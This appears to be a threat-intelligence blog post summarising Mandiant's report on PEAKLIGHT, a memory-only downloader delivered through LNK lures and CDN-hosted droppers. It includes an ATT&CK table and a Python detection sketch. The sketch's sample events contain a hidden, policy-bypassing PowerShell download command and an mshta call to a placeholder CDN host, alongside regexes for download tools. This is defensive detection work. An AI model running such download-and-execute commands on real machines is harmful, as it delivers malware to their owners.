Unveiling the Stealthy Memory-Only Malware Exploiting Content Delivery Networks
Introduction
On August 22, 2024, Mandiant released a detailed report on a newly discovered memory-only malware dubbed "PEAKLIGHT." This sophisticated malware employs a complex, multi-stage infection process, leveraging content delivery networks (CDNs) to distribute malicious payloads. The malware is designed to evade traditional detection methods by operating entirely within memory, making it particularly dangerous and challenging to detect. PEAKLIGHT is part of a broader malware-as-a-service (MaaS) campaign delivering infostealers such as LUMMAC.V2, SHADOWLADDER, and CRYPTBOT.
Report Overview
Mandiant's Managed Defense team identified PEAKLIGHT during investigations into anomalous network activity within a client environment. The malware was initially distributed via malicious Microsoft Shortcut Files (LNKs) embedded within ZIP archives, disguised as pirated movie files. These LNK files acted as the initial infection vector, leading to the download of a memory-only JavaScript dropper from a CDN. This dropper subsequently executed a PowerShell-based downloader, now known as PEAKLIGHT, to fetch additional payloads.
The infection process of PEAKLIGHT is highly intricate, consisting of several stages:
- Stage 1: Movie Lures - Users were tricked into downloading ZIP files containing LNK files, which, when executed, connected to a CDN hosting an obfuscated JavaScript dropper.
- Stage 2: JavaScript Dropper - This memory-only dropper executed a PowerShell script to download and run additional malware from remote servers.
- Stage 3: PEAKLIGHT Downloader - The PowerShell script downloaded files from a CDN and saved them to specific directories on the infected machine. PEAKLIGHT then executed these files, which included various infostealers.
- Stage 4: Final Payload - The downloaded files contained malware components such as LUMMAC.V2, SHADOWLADDER, and CRYPTBOT, designed to exfiltrate sensitive data from the compromised system.
The PEAKLIGHT malware poses a significant threat due to its ability to operate entirely in memory, bypassing traditional file-based detection mechanisms. Organizations infected with PEAKLIGHT are at risk of data theft, as the malware is designed to steal credentials, personal information, and other sensitive data. The use of CDNs to host the malware's payloads further complicates detection, as traffic to these networks is often considered legitimate.
Insights and Analysis
The use of memory-only techniques and trusted content delivery networks highlights cybercriminals' evolving tactics. To counter such threats, defenders must adopt advanced detection methods that monitor in-memory activity.
To mitigate the risk posed by PEAKLIGHT, organizations should implement advanced endpoint detection and response (EDR) solutions capable of monitoring in-memory activities. Regularly updating security software, conducting thorough network traffic analysis, and educating users about the dangers of downloading pirated content are critical steps in defending against this threat.
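The stage list above and the in-memory monitoring advice here both come down to one observable chain on the endpoint: an LNK launch leading to mshta.exe, which spawns a hidden PowerShell downloader pulling from a b-cdn.net host. The following Python detection sketch is an added example, not code from Mandiant's report or this page; it correlates that chain over constructed Sysmon-style process-creation events and tags hits with the ATT&CK IDs the page maps. All event data, hostnames and function names are constructed assumptions.

```python
import re

# Constructed Sysmon-style process-creation events (not real telemetry).
# ppid 1 stands in for the root of the process tree.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 101, "ppid": 100, "image": "mshta.exe",
     "cmdline": "mshta.exe https://example-lure.b-cdn.net/lure"},
    {"pid": 102, "ppid": 101, "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c iwr https://example-lure.b-cdn.net/K1.zip"},
    {"pid": 200, "ppid": 1, "image": "powershell.exe", "cmdline": "powershell.exe Get-Process"},
]

# Patterns for the traits the page describes: CDN-hosted stages, hidden window, download cmdlets.
CDN_URL = re.compile(r"https?://[\w.-]+\.b-cdn\.net/\S*", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
DOWNLOAD = re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget)\b", re.I)
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}


def ancestry(events, pid):
    """Return image names from the given process up to the root, child first."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid]["image"].lower())
        pid = by_pid[pid]["ppid"]
    return chain


def detect(events):
    """Flag events matching the PEAKLIGHT-style chain; returns (pid, technique_id, reason) tuples."""
    findings = []
    for e in events:
        img, cmd = e["image"].lower(), e["cmdline"]
        # Stage 1/2: mshta.exe handed a remote CDN URL (T1218.005 on this page).
        if img == "mshta.exe" and CDN_URL.search(cmd):
            findings.append((e["pid"], "T1218.005", "mshta.exe launched with a remote CDN URL"))
        # Stage 3: hidden PowerShell downloader whose parent is a script host (T1059.001).
        if img == "powershell.exe":
            chain = ancestry(events, e["pid"])
            parent = chain[1] if len(chain) > 1 else None
            if parent in SCRIPT_HOSTS and HIDDEN.search(cmd) and DOWNLOAD.search(cmd) and CDN_URL.search(cmd):
                findings.append((e["pid"], "T1059.001",
                                 "hidden PowerShell CDN download under script host; chain: " + " <- ".join(chain)))
    return findings


if __name__ == "__main__":
    for pid, tid, why in detect(EVENTS):
        print(pid, tid, why)
```

The benign PowerShell event (pid 200) is not flagged because it has neither a script-host parent nor the hidden-window and download traits, which keeps the rule from firing on ordinary administration.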
Indicators of Compromise (IOCs)
MITRE ATT&CK Mapping
| Tactic | Technique | ID | Description |
|---|---|---|---|
| Execution | Command and Scripting Interpreter: PowerShell | T1059.001 | PowerShell is used to execute the PEAKLIGHT downloader script. |
| Execution | System Binary Proxy Execution: Mshta | T1218.005 | Mshta.exe is used to bypass application control and execute malicious code. |
| Defense Evasion | Obfuscated Files or Information | T1027 | PEAKLIGHT uses obfuscated JavaScript and PowerShell to evade detection. |
| Defense Evasion | Masquerading: Match Legitimate Name or Location | T1036.005 | LNK files masquerade as legitimate movie files to deceive users. |
| Command and Control | Exfiltration Over C2 Channel | T1041 | Stolen data is exfiltrated through HTTP/S connections to C2 servers. |